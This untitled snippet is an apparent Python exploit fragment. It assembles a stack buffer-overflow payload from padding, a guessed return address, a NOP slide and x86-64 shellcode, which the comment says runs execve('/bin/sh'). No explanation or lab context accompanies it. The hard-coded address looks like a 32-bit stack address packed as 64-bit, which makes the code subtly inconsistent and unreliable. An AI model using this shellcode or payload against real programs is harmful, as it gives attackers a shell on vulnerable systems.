Untitled

# Shellcode for execve("/bin/sh", NULL, NULL)
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# Construct the payload
padding = b"A" * 4152
return_address = p64(0xbfff0000)  # An estimated stack address, adjust as needed
nop_slide = b"\x90" * 64  # NOP slide to increase chances of hitting the shellcode

payload = padding + return_address + nop_slide + shellcode